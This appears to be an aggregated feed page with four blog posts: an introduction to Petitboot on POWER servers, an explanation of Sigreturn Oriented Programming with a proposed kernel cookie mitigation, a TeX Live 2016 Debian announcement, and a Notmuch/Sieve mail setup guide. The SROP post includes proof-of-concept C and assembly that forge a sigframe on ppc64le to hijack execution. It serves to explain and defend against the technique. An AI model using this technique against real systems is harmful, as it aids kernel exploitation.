A Google search for 'Petitboot' brings up results from a number of places, some describing its use on POWER servers, others talking about how to use it on the PS3, in varying levels of detail. I tend to get a lot of general questions about Petitboot and its behaviour, and have had a few requests for a broad "Welcome to Petitboot" blog, suggesting that existing docs deal with more specific topics.. or that people just aren't reading them :)

So today we're going to take a bit of a crash course in the what, why, and possibly how of Petitboot. I won't delve too much into technical details, and this will be focussed on Petitboot in POWER land since that's where I spend most of my time. Here we go!

What

Aside from a whole lot of firmware and kernel logs flying past, the first thing you'll see when booting a POWER serverIn OPAL mode at least... is Petitboot's main menu:

Main Menu

Petitboot is the first interact-able component a user will see. The word 'BIOS' gets thrown around a lot when discussing this area, but that is wrong, and the people using that word are wrong.

When the OPAL firmware layer Skiboot has finished its own set up, it loads a certain binary (stored on the BMC) into memory and jumps into it. This could hypothetically be anything, but for any POWER server right now it is 'Skiroot'. Skiroot is a full Linux kernel and userspace, which runs Petitboot. People often say Petitboot when they mean Skiroot - technically Petitboot is the server and UI processes that happen to run within Skiroot, and Skiroot is the full kernel and rootfs package. This is more obvious when you look at the op-build project - Petitboot is a package built as part of the kernel and rootfs created by Buildroot.

Petitboot is made of two major parts - the UI processes (one for each available console), and the 'discover' server. The discover server updates the UI processes, manages and scans available disks and network devices, and performs the actual booting of host operating systems. The UI, running in ncurses, displays these options, allows the user to edit boot options and system configuration, and tells the server which boot option to kexec.

Why

The 'why' delves into some of the major architectural differences between a POWER machine and your average x86 machine which, as always, could spread over several blog posts and/or a textbook.

POWER processors don't boot themselves, instead the attached Baseboard Management Controller (BMC) does a lot of low-level poking that gets the primary processor into a state where it is ready to execute instructions. PowerVM systems would then jump directly into the PHYP hypervisor - any subsequent OS, be it AIX or Linux, would then run as a 'partition' under this hypervisor.

What we all really want though is to run Linux directly on the hardware, which meant a new boot process would have to be thought up while still maintaining compatibility with PowerVM so systems could be booted in either mode. Thus became OPAL, and its implementation Skiboot. Skipping over so much detail, the system ends up booting into Skiboot which acts as our firmware layer. Skiboot isn't interactive and doesn't really care about things like disks, so it loads another binary into memory and executes it - Skiroot!

Skiroot exists as an alternative to writing a whole new bootloader just for POWER in OPAL mode, or going through the effort to port an existing bootloader to understand the specifics of POWER. Why do all that when Linux already exists and already knows how to handle disks, network interfaces, and a thousand other things? Not to mention that when Linux gains support for fancy new devices so do we, and adding new features of our own is as simple as writing your average Linux program.

Skiroot itself (not including Skiboot) is roughly comparable to UEFI, or at least much more so than legacy BIOS implementations. But whereas UEFI tends to be a monolithic blob of fairly platform-specific code (in practice), Skiroot is simply a small Linux environment that anyone could put together with Buildroot.

A much better insight into the development and motivation behind Skiroot and Petitboot is available in Jeremy's LCA2013 talk

Back to Petitboot

Petitboot is the part of the 'bootloader' that did need to be written, because users probably wouldn't be too thrilled if they had to manually mount disks and kexec their kernels every time they booted the machine. The Petitboot server process mounts any available disk devices and scans them for available operating systems. That's not to say that it scans the entire disk, because otherwise you could be waiting for quite some time, but rather it looks in a list of common locations for bootloader configuration files. This is handy because it means the operating system doesn't need to have any knowledge of Petitboot - it just uses its usual install scripts and Petitboot reads them to know what is available. At the same time Petitboot makes PXE requests on configured network interfaces so we can netboot, and allows these various sources to be given relative priorities for auto-boot, plus a number of other ways to specially configure booting behaviour.

A particularly neat feature of existing in a Linux environment is the ability to easily recover from boot problems; whereas on another system you might need to use a Live CD to fix a misconfiguration or recover a broken filesystem, in Skiroot you can just drop to the shell and fix the issue right there.

In summary, Petitboot/Skiroot is a small but capable Linux environment that every OPAL POWER machine boots into, gathering up all the various local and remote boot possibilities, and presenting them to you in a state-of-the-art ncurses interface. Petitboot updates all the time, and if you come across a feature that you think Petitboot is missing, patches are very welcome at petitboot@lists.ozlabs.org (or hassle me on IRC)!

Planet Linux Australiasthbrx - a POWER technical blog: SROP Mitigation

What is SROP?

Sigreturn Oriented Programming - a general technique that can be used as an exploit, or as a backdoor to exploit another vulnerability.

Okay, but what is it?

Yeah... Let me take you through some relevant background info, where I skimp on the details and give you the general picture.

In Linux, software interrupts are called signals. More about signals here! Generally a signal will convey some information from the kernel and so most signals will have a specific signal handler (some code that deals with the signal) setup.

Signals are asynchronous - ie they can be sent to a process/program at anytime. When a signal arrives for a process, the kernel suspends the process. The kernel then saves the 'context' of the process - all the general purpose registers (GPRs), the stack pointer, the next-instruction pointer etc - into a structure called a 'sigframe'. The sigframe is stored on the stack, and then the kernel runs the signal handler. At the very end of the signal handler, it calls a special system call called 'sigreturn' - indicating to the kernel that the signal has been dealt with. The kernel then grabs the sigframe from the stack, restores the process's context and resumes the execution of the process.

This is the rough mental picture you should have:

Double Format

Okay... but you still haven't explained what SROP is..?

Well, if you insist...

The above process was designed so that the kernel does not need to keep track of what signals it has delivered. The kernel assumes that the sigframe it takes off the stack was legitimately put there by the kernel because of a signal. This is where we can trick the kernel!

If we can construct a fake sigframe, put it on the stack, and call sigreturn, the kernel will assume that the sigframe is one it put there before and will load the contents of the fake context into the CPU's registers and 'resume' execution from where the fake sigframe tells it to. And that is what SROP is!

Well that sounds cool, show me!

Firstly we have to set up a (valid) sigframe:

By valid sigframe, I mean a sigframe that the kernel will not reject. Luckily most architectures only examine a few parts of the sigframe to determine the validity of it. Unluckily, you will have to dive into the source code to find out which parts of the sigframe you need to set up for your architecture. Have a look in the function which deals with the syscall sigreturn (probably something like sys_sigreturn() ).

For a real time signal on a little endian powerpc 64bit machine, the sigframe looks something like this:

struct rt_sigframe {
        struct ucontext uc;
        unsigned long _unused[2];
        unsigned int tramp[TRAMP_SIZE];
        struct siginfo __user *pinfo;
        void __user *puc;
        struct siginfo info;
        unsigned long user_cookie;
        /* New 64 bit little-endian ABI allows redzone of 512 bytes below sp */
        char abigap[USER_REDZONE_SIZE];
} __attribute__ ((aligned (16)));

The most important part of the sigframe is the context or ucontext as this contains all the register values that will be written into the CPU's registers when the kernel loads in the sigframe. To minimise potential issues we can copy valid values from the current GPRs into our fake ucontext:

register unsigned long r1 asm("r1");
register unsigned long r13 asm("r13");
struct ucontext ctx = { 0 };

/* We need a system thread id so copy the one from this process */
ctx.uc_mcontext.gp_regs[PT_R13] = r13;

/*  Set the context's stack pointer to where the current stack pointer is pointing */
ctx.uc_mcontext.gp_regs[PT_R1] = r1;

We also need to tell the kernel where to resume execution from. As this is just a test to see if we can successfully get the kernel to resume execution from a fake sigframe we will just point it to a function that prints out some text.

/* Set the next instruction pointer (NIP) to the code that we want executed */
ctx.uc_mcontext.gp_regs[PT_NIP] = (unsigned long) test_function;

For some reason the sys_rt_sigreturn() on little endian powerpc 64bit checks the endianess bit of the ucontext's MSR register, so we need to set that:

/* Set MSR bit if LE */
ctx.uc_mcontext.gp_regs[PT_MSR] = 0x01;

Fun fact: not doing this or setting it to 0 results in the CPU switching from little endian to big endian! For a powerpc machine sys_rt_sigreturn() only examines ucontext, so we do not need to set up a full sigframe.

Secondly we have to put it on the stack:

/* Set current stack pointer to our fake context */
r1 = (unsigned long) &ctx;

Thirdly, we call sigreturn:

/* Syscall - NR_rt_sigreturn */
asm("li 0, 172\n");
asm("sc\n");

When the kernel receives the sigreturn call, it looks at the userspace stack pointer for the ucontext and loads this in. As we have put valid values in the ucontext, the kernel assumes that this is a valid sigframe that it set up earlier and loads the contents of the ucontext in the CPU's registers "and resumes" execution of the process from the address we pointed the NIP to.

Obviously, you need something worth executing at this address, but sadly that next part is not in my job description. This is a nice gateway into the kernel though and would pair nicely with another kernel vulnerability. If you are interested in some more in depth examples, have a read of this paper.

So how can we mitigate this?

Well, I'm glad you asked. We need some way of distinguishing between sigframes that were put there legitimately by the kernel and 'fake' sigframes. The current idea that is being thrown around is cookies, and you can see the x86 discussion here.

The proposed solution is to give every sighand struct a randomly generated value. When the kernel constructs a sigframe for a process, it stores a 'cookie' with the sigframe. The cookie is a hash of the cookie's location and the random value stored in the sighand struct for the process. When the kernel receives a sigreturn, it hashes the location where the cookie should be with the randomly generated number in sighand struct - if this matches the cookie, the cookie is zeroed, the sigframe is valid and the kernel will restore this context. If the cookies do not match, the sigframe is not restored.

Potential issues:

Multithreading: Originally the random number was suggested to be stored in the task struct. However, this would break multi-threaded applications as every thread has its own task struct. As the sighand struct is shared by threads, this should not adversely affect multithreaded applications.
Cookie location: At first I put the cookie on top of the sigframe. However some code in userspace assumed that all the space between the signal handler and the sigframe  was essentially up for grabs and would zero the cookie before I could read the cookie value. Putting the cookie below the sigframe was also a no-go due to the ABI-gap (a gap below the stack pointer that signal code cannot touch) being a part of the sigframe. Putting the cookie inside the sigframe, just above the ABI gap has been fine with all the tests I have run so far!
Movement of sigframe: If you move the sigframe on the stack, the cookie value will no longer be valid... I don't think that this is something that you should be doing, and have not yet come across a scenario that does this.

For a more in-depth explanation of SROP, click here.

Planet DebianNorbert Preining: TeX Live 2016 (pretest) hits Debian/unstable

The sources of TeX Live binaries are now (hopefully) frozen, and barring unpleasant surprises, these will be code going into the final release (one fix for luatex is coming, though). Thus, I thought it is time to upload TeX Live 2016 packages to Debian/unstable to expose them to a wider testing area – packages in experimental receive hardly any testing.

texlive-2016-debian-pretest

The biggest changes are with Luatex, where APIs were changed fundamentally and practically each package using luatex specific code needs to be adjusted. Most of the package authors have already uploaded fixed versions to CTAN and thus to TeX Live, but some are surely still open. I have taken the step to provide driver files for pgf and pgfplots to support pgf with luatex (as I need it myself).

One more thing to be mentioned is that the binaries finally bring support for reproducible builds by supporting the SOURCE_DATE_EPOCH environment variable.

Please send bug reports, suggestions, and improvements (patches welcome!) to improve the quality of the packages. In particular, lintian complains a lot about various man page problems. If someone wants to go through all that it would help a lot. Details on request.

Other than that, many packages have been updated or added since the last Debian packages, here are the incomplete lists (I had accidentally deleted the tlmgr.log file at some point):

new: acmart, chivo, coloring, dvisvgm-def, langsci, makebase, pbibtex-base, platex, ptex-base, ptex-fonts, rosario, uplatex, uptex-base, uptex-fonts.

updated: achemso, acro, arabluatex, arydshln, asymptote, babel-french, biblatex-ieee, bidi, bookcover, booktabs, bxjscls, chemformula, chemmacros, cslatex, csplain, cstex, dtk, dvips, epspdf, fibeamer, footnotehyper, glossaries, glossaries-extra, gobble, graphics, gregoriotex, hyperref, hyperxmp, jadetex, jslectureplanner, koma-script, kpathsea, latex-bin, latexmk, lollipop, luaotfload, luatex, luatexja, luatexko, mathastext, mcf2graph, mex, microtype, msu-thesis, m-tx, oberdiek, pdftex, pdfx, pgf, pgfplots, platex, pmx, pst-cie, pst-func, pst-ovl, pst-plot, ptex, ptex-fonts, reledmac, shdoc, substances, tasks, tetex, tools, uantwerpendocs, ucharclasses, uplatex, uptex, uptex-fonts, velthuis, xassoccnt, xcolor, xepersian, xetex, xgreek, xmltex.

Enjoy.

,

Planet DebianAntoine Beaupré: Notmuch, offlineimap and Sieve setup

I've been using Notmuch since about 2011, switching away from Mutt to deal with the monstrous amount of emails I was, and still am dealing with on the computer. I have contributed a few patches and configs on the Notmuch mailing list, but basically, I have given up on merging patches, and instead have a custom config in Emacs that extend it the way I want. In the last 5 years, Notmuch has progressed significantly, so I haven't found the need to patch it or make sweeping changes.

The huge INBOX of death

The one thing that is problematic with my use of Notmuch is that I end up with a ridiculously large INBOX folder. Before the cleanup I did this morning, I had over 10k emails in there, out of about 200k emails overall.

Since I mostly work from my laptop these days, the Notmuch tags are only on the laptop, and not propagated to the server. This makes accessing the mail spool directly, from webmail or simply through a local client (say Mutt) on the server, really inconvenient, because it has to load a very large spool of mail, which is very slow in Mutt. Even worse, a bunch of mail that was archived in Notmuch shows up in the spool because it's just removed tags in Notmuch: the mails are still in the inbox, even though they are marked as read.

So I was hoping that Notmuch would help me deal with the giant inbox of death problem, but in fact, when I don't use Notmuch, it actually makes the problem worse. Today, I did a bunch of improvements to my setup to fix that.

The first thing I did was to kill procmail, which I was surprised to discover has been dead for over a decade. I switched over to Sieve for filtering, having already switched to Dovecot a while back on the server. I tried to use the procmail2sieve.pl conversion tool but it didn't work very well, so I basically rewrote the whole file. Since I was mostly using Notmuch for filtering, there wasn't much left to convert.

Sieve filtering

But this is where things got interesting: Sieve is so simpler to use and more intuitive that I started doing more interesting stuff in bridging the filtering system (Sieve) with the tagging system (Notmuch). Basically, I use Sieve to split large chunks of emails off my main inbox, to try to remove as much spam, bulk email, notifications and mailing lists as possible from the larger flow of emails. Then Notmuch comes in and does some fine-tuning, assigning tags to specific mailing lists or topics, and being generally the awesome search engine that I use on a daily basis.

Dovecot and Postfix configs

For all of this to work, I had to tweak my mail servers to talk sieve. First, I enabled sieve in Dovecot:

--- a/dovecot/conf.d/15-lda.conf
+++ b/dovecot/conf.d/15-lda.conf
@@ -44,5 +44,5 @@

 protocol lda {
   # Space separated list of plugins to load (default is global mail_plugins).
-  #mail_plugins = $mail_plugins
+  mail_plugins = $mail_plugins sieve
 }

Then I had to switch from procmail to dovecot for local delivery, that was easy, in Postfix's perennial main.cf:

#mailbox_command = /usr/bin/procmail -a "$EXTENSION"
mailbox_command = /usr/lib/dovecot/dovecot-lda -a "$RECIPIENT"

Note that dovecot takes the full recipient as an argument, not just the extension. That's normal. It's clever, it knows that kind of stuff.

One last tweak I did was to enable automatic mailbox creation and subscription, so that the automatic extension filtering (below) can create mailboxes on the fly:

--- a/dovecot/conf.d/15-lda.conf
+++ b/dovecot/conf.d/15-lda.conf
@@ -37,10 +37,10 @@
 #lda_original_recipient_header =

 # Should saving a mail to a nonexistent mailbox automatically create it?
-#lda_mailbox_autocreate = no
+lda_mailbox_autocreate = yes

 # Should automatically created mailboxes be also automatically subscribed?
-#lda_mailbox_autosubscribe = no
+lda_mailbox_autosubscribe = yes

 protocol lda {
   # Space separated list of plugins to load (default is global mail_plugins).

Sieve rules

Then I had to create a Sieve ruleset. That thing lives in ~/.dovecot.sieve, since I'm running Dovecot. Your provider may accept an arbitrary ruleset like this, or you may need to go through a web interface, or who knows. I'm assuming you're running Dovecot and have a shell from now on.

The first part of the file is simply to enable a bunch of extensions, as needed:

# Sieve Filters
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples
# https://tools.ietf.org/html/rfc5228
require "fileinto";
require "envelope";
require "variables";
require "subaddress";
require "regex";
require "vacation";
require "vnd.dovecot.debug";

Some of those are not used yet, for example I haven't tested the vacation module yet, but I have good hopes that I can use it as a way to announce a special "urgent" mailbox while I'm traveling. The rationale is to have a distinct mailbox for urgent messages that is announced in the autoreply, that hopefully won't be parsable by bots.

Spam filtering

Then I filter spam using this fairly standard expression:

########################################################################
# spam 
# possible improvement, server-side:
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples#Filtering_using_the_spamtest_and_virustest_extensions
if header :contains "X-Spam-Flag" "YES" {
  fileinto "junk";
  stop;
} elsif header :contains "X-Spam-Level" "***" {
  fileinto "greyspam";
  stop;
}

This puts stuff into the junk or greyspam folder, based on the severity. I am very aggressive with spam: stuff often ends up in the greyspam folder, which I need to check from time to time, but it beats having too much spam in my inbox.

Mailing lists

Mailing lists are generally put into a lists folder, with some mailing lists getting their own folder:

########################################################################
# lists
# converted from procmail
if header :contains "subject" "FreshPorts" {
    fileinto "freshports";
} elsif header :contains "List-Id" "alternc.org" {
    fileinto "alternc";
} elsif header :contains "List-Id" "koumbit.org" {
    fileinto "koumbit";
} elsif header :contains ["to", "cc"] ["lists.debian.org",
                                       "anarcat@debian.org"] {
    fileinto "debian";
# Debian BTS
} elsif exists "X-Debian-PR-Message" {
    fileinto "debian";
# default lists fallback
} elsif exists "List-Id" {
    fileinto "lists";
}

The idea here is that I can safely subscribe to lists without polluting my mailbox by default. Further processing is done in Notmuch.

Extension matching

I also use the magic +extension tag on emails. If you send email to, say, foo+extension@example.com then the emails end up in the foo folder. This is done with the help of the following recipe:

########################################################################
# wildcard +extension
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples#Plus_Addressed_mail_filtering
if envelope :matches :detail "to" "*" {
  # Save name in ${name} in all lowercase except for the first letter.
  # Joe, joe, jOe thus all become 'Joe'.
  set :lower "name" "${1}";
  fileinto "${name}";
  #debug_log "filed into mailbox ${name} because of extension";
  stop;
}

This is actually very effective: any time I register to a service, I try as much as possible to add a +extension that describe the service. Of course, spammers and marketers (it's the same really) are free to drop the extension and I suspect a lot of them do, but it helps with honest providers and this actually sorts a lot of stuff out of my inbox into topically-defined folders.

It is also a security issue: someone could flood my filesystem with tons of mail folders, which would cripple the IMAP server and eat all the inodes, 4 times faster than just sending emails. But I guess I'll cross that bridge when I get there: anyone can flood my address and I have other mechanisms to deal with this.

The trick is to then assign tags to all folders so that they appear in the Notmuch-emacs welcome view:

echo tagging folders
for folder in $(ls -ad $HOME/Maildir/${PREFIX}*/ | egrep -v "Maildir/${PREFIX}(feeds.*|Sent.*|INBOX/|INBOX/Sent)\$"); do
    tag=$(echo $folder | sed 's#/$##;s#^.*/##')
    notmuch tag +$tag -inbox tag:inbox and not tag:$tag and folder:${PREFIX}$tag
done

This is part of my notmuch-tag script that includes a lot more fine-tuned filtering, detailed below.

Automated reports filtering

Another thing I get a lot of is machine-generated "spam". Well, it's not commercial spam, but it's a bunch of Nagios, cron jobs, and god knows what software thinks it's important to send me emails every day. I get a lot less of those these days since I'm off work at Koumbit, but still, those can be useful for others as well:

if anyof (exists "X-Cron-Env",
          header :contains ["subject"] ["security run output",
                                        "monthly run output",
                                        "daily run output",
                                        "weekly run output",
                                        "Debian Package Updates",
                                        "Debian package update",
                                        "daily mail stats",
                                        "Anacron job",
                                        "nagios",
                                        "changes report",
                                        "run output",
                                        "[Systraq]",
                                        "Undelivered mail",
                                        "Postfix SMTP server: errors from",
                                        "backupninja",
                                        "DenyHosts report",
                                        "Debian security status",
                                        "apt-listchanges"
                                        ],
           header :contains "Auto-Submitted" "auto-generated",
           envelope :contains "from" ["nagios@",
                                      "logcheck@"])
    {
    fileinto "rapports";
}
# imported from procmail
elsif header :comparator "i;octet" :contains "Subject" "Cron" {
  if header :regex :comparator "i;octet"  "From" ".*root@" {
        fileinto "rapports";
  }
}
elsif header :comparator "i;octet" :contains "To" "root@" {
  if header :regex :comparator "i;octet"  "Subject" "\\*\\*\\* SECURITY" {
        fileinto "rapports";
  }
}
elsif header :contains "Precedence" "bulk" {
    fileinto "bulk";
}

Refiltering emails

Of course, after all this I still had thousands of emails in my inbox, because the sieve filters apply only on new emails. The beauty of Sieve support in Dovecot is that there is a neat sieve-filter command that can reprocess an existing mailbox. That was a lifesaver. To run a specific sieve filter on a mailbox, I simply run:

sieve-filter .dovecot.sieve INBOX 2>&1 | less

Well, this doesn't do anything. To really execute the filters, you need the -e flags, and to write to the INBOX for real, you need the -w flag as well, so the real run looks something more like this:

sieve-filter -e -W -v .dovecot.sieve INBOX > refilter.log 2>&1

The funky output redirects are necessary because this outputs a lot of crap. Also note that, unfortunately, the fake run output differs from the real run and is actually more verbose, which makes it really less useful than it could be.

Archival

I also usually archive my mails every year, rotating my mailbox into an Archive.YYYY directory. For example, now all mails from 2015 are archived in a Archive.2015 directory. I used to do this with Mutt tagging and it was a little slow and error-prone. Now, i simply have this Sieve script:

require ["variables","date","fileinto","mailbox", "relational"];

# Extract date info
if currentdate :matches "year" "*" { set "year" "${1}"; }

if date :value "lt" :originalzone "date" "year" "${year}" {
  if date :matches "received" "year" "*" {
    # Archive Dovecot mailing list items by year and month.
    # Create folder when it does not exist.
    fileinto :create "Archive.${1}";
  }
}

I went from 15613 to 1040 emails in my real inbox with this process (including refiltering with the default filters as well).

Notmuch configuration

My Notmuch configuration is a in three parts: I have small settings in ~/.notmuch-config. The gist of it is:

[new]
tags=unread;inbox;
ignore=

#[maildir]
# synchronize_flags=true
# tentative patch that was refused upstream
# http://mid.gmane.org/1310874973-28437-1-git-send-email-anarcat@koumbit.org
#reckless_trash=true

[search]
exclude_tags=deleted;spam;

I omitted the fairly trivial [user] section for privacy reasons and [database] for declutter.

Then I have a notmuch-tag script symlinked into ~/Maildir/.notmuch/hooks/post-new. It does way too much stuff to describe in details here, but here are a few snippets:

if hostname | grep angela > /dev/null; then
    PREFIX=Anarcat/
else
    PREFIX=.
fi

This sets a variable that makes the script work on my laptop (angela), where mailboxes are in Maildir/Anarcat/foo or the server, where mailboxes are in Maildir/.foo.

I also have special rules to tag my RSS feeds, which are generated by feed2imap, which is documented shortly below:

echo tagging feeds
( cd $HOME/Maildir/ && for feed in ${PREFIX}feeds.*; do
    name=$(echo $feed | sed "s#${PREFIX}feeds\\.##")
    notmuch tag +feeds +$name -inbox folder:$feed and not tag:feeds
done )

Another example that would be useful is how to tag mailing lists, for example, this removes the inbox tag and adds the notmuch tags to emails from the notmuch mailing list.

notmuch tag +lists +notmuch      -inbox tag:inbox and "to:notmuch@notmuchmail.org"

Finally, I have a bunch of special keybindings in ~/.emacs.d/notmuch-config.el:

;; autocompletion
(eval-after-load "notmuch-address"
  '(progn
     (notmuch-address-message-insinuate)))

; use fortune for signature, config is in custom
(add-hook 'message-setup-hook 'fortune-to-signature)
; don't remember what that is
(add-hook 'notmuch-show-hook 'visual-line-mode)

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; keymappings
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
(define-key notmuch-show-mode-map "S"
  (lambda ()
    "mark message as spam and advance"
    (interactive)
    (notmuch-show-tag '("+spam" "-unread"))
    (notmuch-show-next-open-message-or-pop)))

(define-key notmuch-search-mode-map "S"
  (lambda (&optional beg end)
    "mark message as spam and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "+spam" "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-show-mode-map "H"
  (lambda ()
    "mark message as spam and advance"
    (interactive)
    (notmuch-show-tag '("-spam"))
    (notmuch-show-next-open-message-or-pop)))

(define-key notmuch-search-mode-map "H"
  (lambda (&optional beg end)
    "mark message as spam and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-spam") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "l" 
  (lambda (&optional beg end)
    "undelete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "u"
  (lambda (&optional beg end)
    "undelete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-deleted") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "d"
  (lambda (&optional beg end)
    "delete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "+deleted" "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-show-mode-map "d"
  (lambda ()
    "delete current message and advance"
    (interactive)
    (notmuch-show-tag '("+deleted" "-unread"))
    (notmuch-show-next-open-message-or-pop)))

;; https://notmuchmail.org/emacstips/#index17h2
(define-key notmuch-show-mode-map "b"
  (lambda (&optional address)
    "Bounce the current message."
    (interactive "sBounce To: ")
    (notmuch-show-view-raw-message)
    (message-resend address)
    (kill-buffer)))

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; my custom notmuch functions
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
(defun anarcat/notmuch-search-next-thread ()
  "Skip to next message from region or point

This is necessary because notmuch-search-next-thread just starts
from point, whereas it seems to me more logical to start from the
end of the region."
  ;; move line before the end of region if there is one
  (unless (= beg end)
    (goto-char (- end 1)))
  (notmuch-search-next-thread))

;; Linking to notmuch messages from org-mode
;; https://notmuchmail.org/emacstips/#index23h2
(require 'org-notmuch nil t)

(message "anarcat's custom notmuch config loaded")

This is way too long: in my opinion, a bunch of that stuff should be factored in upstream, but some features have been hard to get in. For example, Notmuch is really hesitant in marking emails as deleted. The community is also very strict about having unit tests for everything, which makes writing new patches a significant challenge for a newcomer, which will often need to be familiar with both Elisp and C. So for now I just have those configs that I carry around.

Emails marked as deleted or spam are processed with the following script named notmuch-purge which I symlink to ~/Maildir/.notmuch/hooks/pre-new:

#!/bin/sh

if hostname | grep angela > /dev/null; then
    PREFIX=Anarcat/
else
    PREFIX=.
fi

echo moving tagged spam to the junk folder
notmuch search --output=files tag:spam \
        and not folder:${PREFIX}junk \
        and not folder:${PREFIX}greyspam \
        and not folder:Koumbit/INBOX \
        and not path:Koumbit/** \
    | while read file; do
          mv "$file" "$HOME/Maildir/${PREFIX}junk/cur"
      done

echo unconditionnally deleting deleted mails
notmuch search --output=files tag:deleted | xargs -r rm

Oh, and there's also customization for Notmuch:

;; -*- mode: emacs-lisp; auto-recompile: t; -*-
(custom-set-variables
 ;; from https://anarc.at/sigs.fortune
 '(fortune-file "/home/anarcat/.mutt/sigs.fortune")
 '(message-send-hook (quote (notmuch-message-mark-replied)))
 '(notmuch-address-command "notmuch-address")
 '(notmuch-always-prompt-for-sender t)
 '(notmuch-crypto-process-mime t)
 '(notmuch-fcc-dirs
   (quote
    ((".*@koumbit.org" . "Koumbit/INBOX.Sent")
     (".*" . "Anarcat/Sent"))))
 '(notmuch-hello-tag-list-make-query "tag:unread")
 '(notmuch-message-headers (quote ("Subject" "To" "Cc" "Bcc" "Date" "Reply-To")))
 '(notmuch-saved-searches
   (quote
    ((:name "inbox" :query "tag:inbox and not tag:koumbit and not tag:rt")
     (:name "unread inbox" :query "tag:inbox and tag:unread")
     (:name "unread" :query "tag:unred")
     (:name "freshports" :query "tag:freshports and tag:unread")
     (:name "rapports" :query "tag:rapports and tag:unread")
     (:name "sent" :query "tag:sent")
     (:name "drafts" :query "tag:draft"))))
 '(notmuch-search-line-faces
   (quote
    (("deleted" :foreground "red")
     ("unread" :weight bold)
     ("flagged" :foreground "blue"))))/
 '(notmuch-search-oldest-first nil)
 '(notmuch-show-all-multipart/alternative-parts nil)
 '(notmuch-show-all-tags-list t)
 '(notmuch-show-insert-text/plain-hook
   (quote
    (notmuch-wash-convert-inline-patch-to-part notmuch-wash-tidy-citations notmuch-wash-elide-blank-lines notmuch-wash-excerpt-citations)))
 )

I think that covers it.

Offlineimap

So of course the above works well on the server directly, but how do run Notmuch on a remote machine that doesn't have access to the mail spool directly? This is where OfflineIMAP comes in. It allows me to incrementally synchronize a local Maildir folder hierarchy with a a remote IMAP server. I am assuming you already have an IMAP server configured, since you already configured Sieve above.

Note that other synchronization tools exist. The other popular one is isync but I had trouble migrating to it (see courriels for details) so for now I am sticking with OfflineIMAP.

The configuration is fairly simple:

[general]
accounts = Anarcat
ui = Blinkenlights
maxsyncaccounts = 3

[Account Anarcat]
localrepository = LocalAnarcat
remoterepository = RemoteAnarcat
# refresh all mailboxes every 10 minutes
autorefresh = 10
# run notmuch after refresh
postsynchook = notmuch new
# sync only mailboxes that changed
quick = -1
## possible optimisation: ignore mails older than a year
#maxage = 365

# local mailbox location
[Repository LocalAnarcat]
type = Maildir
localfolders = ~/Maildir/Anarcat/

# remote IMAP server
[Repository RemoteAnarcat]
type = IMAP
remoteuser = anarcat
remotehost = anarc.at
ssl = yes
# without this, the cert is not verified (!)
sslcacertfile = /etc/ssl/certs/DST_Root_CA_X3.pem
# do not sync archives
folderfilter = lambda foldername: not re.search('(Sent\.20[01][0-9]\..*)', foldername) and not re.search('(Archive.*)', foldername)
# and only subscribed folders
subscribedonly = yes
# don't reconnect all the time
holdconnectionopen = yes
# get mails from INBOX immediately, doesn't trigger postsynchook
idlefolders = ['INBOX']

Critical parts are:

  • postsynchook: obviously, we want to run notmuch after fetching mail
  • idlefolders: receives emails immediately without waiting for the longer autorefresh delay, which means that most mailboxes don't see new emails until 10 minutes in the worst case. unfortunately, doesn't run the postsynchook so I need to hit G in Emacs to see new mail
  • quick=-1, subscribedonly, holdconnectionopen: makes most runs much, much faster as it skips unchanged or unsubscribed folders and keeps the connection to the server

The other settings should be self-explanatory.

RSS feeds

I gave up on RSS readers, or more precisely, I merged RSS feeds and email. The first time I heard of this, it sounded like a horrible idea, because it means yet more emails! But with proper filtering, it's actually a really nice way to process emails, since it leverages the distributed nature of email.

For this I use a fairly standard feed2imap, although I do not deliver to an IMAP server, but straight to a local Maildir. The configuration looks like this:

---
include-images: true
target-refix: &target "maildir:///home/anarcat/Maildir/.feeds."
feeds:
- name: Planet Debian
  url: http://planet.debian.org/rss20.xml
  target: [ *target, 'debian-planet' ]

I have obviously more feeds, the above is just and example. This will deliver the feeds as emails in one mailbox per feed, in ~/Maildir/.feeds.debian-planet, in the above example.

Troubleshooting

You will fail at writing the sieve filters correctly, and mail will (hopefully?) fall through to your regular mailbox. Syslog will tell you things fail, as expected, and details are in your .dovecot.sieve.log file in your home directory.

I also enabled debugging on the Sieve module

--- a/dovecot/conf.d/90-sieve.conf
+++ b/dovecot/conf.d/90-sieve.conf
@@ -51,6 +51,7 @@ plugin {
        # deprecated imapflags extension in addition to all extensions were already
   # enabled by default.
   #sieve_extensions = +notify +imapflags
+  sieve_extensions = +vnd.dovecot.debug

   # Which Sieve language extensions are ONLY available in global scripts. This
   # can be used to restrict the use of certain Sieve extensions to administrator

This allowed me to use debug_log function in the rulesets to output stuff directly to the logfile.

Further improvements

Of course, this is all done on the commandline, but that is somewhat expected if you are already running Notmuch. Of course, it would be much easier to edit those filters through a GUI. Roundcube has a nice Sieve plugin, and Thunderbird also has such a plugin as well. Since Sieve is a standard, there's a bunch of clients available. All those need you to setup some sort of thing on the server, which I didn't bother doing yet.

